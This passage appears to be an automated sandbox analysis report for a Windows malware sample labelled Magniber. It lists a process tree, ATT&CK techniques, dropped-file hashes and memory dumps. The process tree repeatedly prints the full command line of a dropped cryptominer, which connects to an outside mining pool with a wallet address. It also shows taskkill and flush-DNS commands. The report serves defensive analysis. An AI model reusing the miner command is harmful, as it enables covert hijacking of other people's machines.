  C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ipconfig /flushdns
  2⤵
  PID:1684
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /flushdns
    3⤵
    - Gathers network information
    PID:2216
- C:\Windows\SysWOW64\cmd.exe
  cmd /c taskkill /f /im spreadTpqrst.exe&&exit
  2⤵
  PID:804
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im spreadTpqrst.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2700
- C:\ProgramData\spreadTpqrst.exe
  C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
  2⤵
  - Executes dropped EXE
  PID:796
- C:\ProgramData\spreadTpqrst.exe
  C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2644
- C:\Windows\SysWOW64\cmd.exe
  cmd /c taskkill /f /im spreadTpqrst.exe&&exit
  2⤵
  PID:2516
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im spreadTpqrst.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2604
- C:\ProgramData\spreadTpqrst.exe
  C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1976
- C:\ProgramData\spreadTpqrst.exe
  C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2236
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ipconfig /flushdns
  2⤵
  PID:2324
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /flushdns
    3⤵
    - Gathers network information
    PID:3040

C:\Windows\system32\taskeng.exe
taskeng.exe {9179F872-1C2D-4726-8603-3ABCE93DE861} S-1-5-21-268080393-3149932598-1824759070-1000:UHRQKJCP\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1484
- C:\Users\Admin\AppData\Local\Temp\2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
  C:\Users\Admin\AppData\Local\Temp\2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
  2⤵
  - Executes dropped EXE
  - Checks for VirtualBox DLLs, possible anti-VM trick
  PID:856

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\X64.dll

Filesize
85KB

MD5
77563d80fa2f1e20a78514864ad28fa2

SHA1
8a70fa975bbbc4c2337de7c9a1d0934b33775d22

SHA256
e8f6bf59b5a26045c03e5c7928349c8d6eb0344dc5db23e5f9742a864b652ac4

SHA512
62b072faa0e5a41c6ff90e0ee01ec001afb65fdac1360dc115c5e70abe5fe8d30f4fce874c2049711e36d49007bfe3c602cf7353b5cce4e3e89157763ca3986d

Download Submit
C:\ProgramData\X86.dll

Filesize
71KB

MD5
5500204d5a288387e5fca750e9617200

SHA1
23fa2474882a5f3cfcefc542e76b80fa99fa9a8c

SHA256
fd7db69e5a5185f9284c02a38e747fe5f2fd844fb14a527bed51e403939813b7

SHA512
84d1dfd160377660d28ff2fc00688a1ceb78e842b2a81eac75571a43218c8487638a1bf03305c481dc78d335c95113e22f68e54014703fb2c49605777951a416

Download Submit
C:\Users\Admin\AppData\Local\Temp\2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe

Filesize
9.0MB

MD5
2d927fdb462570728a981443bf36d19f

SHA1
eb4f351d937729b14a196bf228ba12a2ff07e73e

SHA256
d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239

SHA512
efdf3b568fa07d67bb89eb8880c5140653321f9267c771045d1c7be6a6e88fd680059b779d2e4da497e0a88ff1e9adac6e293bb254e5c4dda776aafd518097c9

Download Submit
\ProgramData\SMB.exe

Filesize
3.1MB

MD5
7b2f170698522cd844e0423252ad36c1

SHA1
303ac0aaf0e9f48d4943e57d1ee6c757f2dd48c5

SHA256
5214f356f2e8640230e93a95633cd73945c38027b23e76bb5e617c71949f8994

SHA512
7155477e6988a16f6d12a0800ab72b9b9b64b97a509324ac0669cec2a4b82cd81b3481ae2c2d1ce65e73b017cebb56628d949d6195aac8f6ddd9625a80789dfa

Download Submit
\ProgramData\spreadTpqrst.exe

Filesize
1.3MB

MD5
23d84a7ed2e8e76d0a13197b74913654

SHA1
23d04ba674bafbad225243dc81ce7eccd744a35a

SHA256
ac530d542a755ecce6a656ea6309717ec222c34d7e34c61792f3b350a8a29301

SHA512
aa6b0100d477214d550b6498787190fc1a8fafa7c478f9595d45e4e76ece9888b84dcca26696500d5710a9d1acae4810f2606d8962c46d31f2bdfcdd27bd675c

Download Submit
memory/328-150-0x0000000004420000-0x0000000004A64000-memory.dmp

Filesize
6.3MB

Download
memory/328-9-0x0000000004420000-0x0000000004A64000-memory.dmp

Filesize
6.3MB

Download
memory/796-183-0x000000013F930000-0x000000013FF74000-memory.dmp

Filesize
6.3MB

Download
memory/796-181-0x000000013F930000-0x000000013FF74000-memory.dmp

Filesize
6.3MB

Download
memory/844-171-0x000000013F560000-0x000000013FBA4000-memory.dmp

Filesize
6.3MB

Download
memory/1036-155-0x000000013FB50000-0x0000000140194000-memory.dmp

Filesize
6.3MB

Download
memory/1036-153-0x000000013FB50000-0x0000000140194000-memory.dmp

Filesize
6.3MB

Download
memory/1036-149-0x000000013FB50000-0x0000000140194000-memory.dmp

Filesize
6.3MB

Download
memory/1520-146-0x000000013F620000-0x000000013FC64000-memory.dmp

Filesize
6.3MB

Download
memory/1520-144-0x000000013F620000-0x000000013FC64000-memory.dmp

Filesize
6.3MB

Download
memory/1976-195-0x000000013F110000-0x000000013F754000-memory.dmp

Filesize
6.3MB

Download
memory/1976-193-0x000000013F110000-0x000000013F754000-memory.dmp

Filesize
6.3MB

Download
memory/2228-174-0x000000013F920000-0x000000013FF64000-memory.dmp

Filesize
6.3MB

Download
memory/2228-176-0x000000013F920000-0x000000013FF64000-memory.dmp

Filesize
6.3MB

Download
memory/2228-178-0x000000013F920000-0x000000013FF64000-memory.dmp

Filesize
6.3MB

Download
memory/2236-200-0x000000013FED0000-0x0000000140514000-memory.dmp

Filesize
6.3MB

Download
memory/2236-198-0x000000013FED0000-0x0000000140514000-memory.dmp

Filesize
6.3MB

Download
memory/2644-190-0x000000013FAA0000-0x00000001400E4000-memory.dmp

Filesize
6.3MB

Download
memory/2644-188-0x000000013FAA0000-0x00000001400E4000-memory.dmp

Filesize
6.3MB

Download
memory/2644-186-0x000000013FAA0000-0x00000001400E4000-memory.dmp

Filesize
6.3MB

Download
memory/2764-141-0x000000013F0B0000-0x000000013F6F4000-memory.dmp

Filesize
6.3MB

Download
memory/2764-135-0x000000013F0B0000-0x000000013F6F4000-memory.dmp

Filesize
6.3MB

Download
memory/2764-11-0x00000000001F0000-0x0000000000204000-memory.dmp

Filesize
80KB

Download
memory/2764-10-0x000000013F0B0000-0x000000013F6F4000-memory.dmp

Filesize
6.3MB

Download
memory/2808-161-0x000000013F220000-0x000000013F864000-memory.dmp

Filesize
6.3MB

Download
memory/2808-158-0x000000013F220000-0x000000013F864000-memory.dmp

Filesize
6.3MB

Download
memory/2968-168-0x000000013F570000-0x000000013FBB4000-memory.dmp

Filesize
6.3MB

Download
memory/2968-166-0x000000013F570000-0x000000013FBB4000-memory.dmp

Filesize
6.3MB

Download
memory/2968-164-0x000000013F570000-0x000000013FBB4000-memory.dmp

Filesize
6.3MB

Download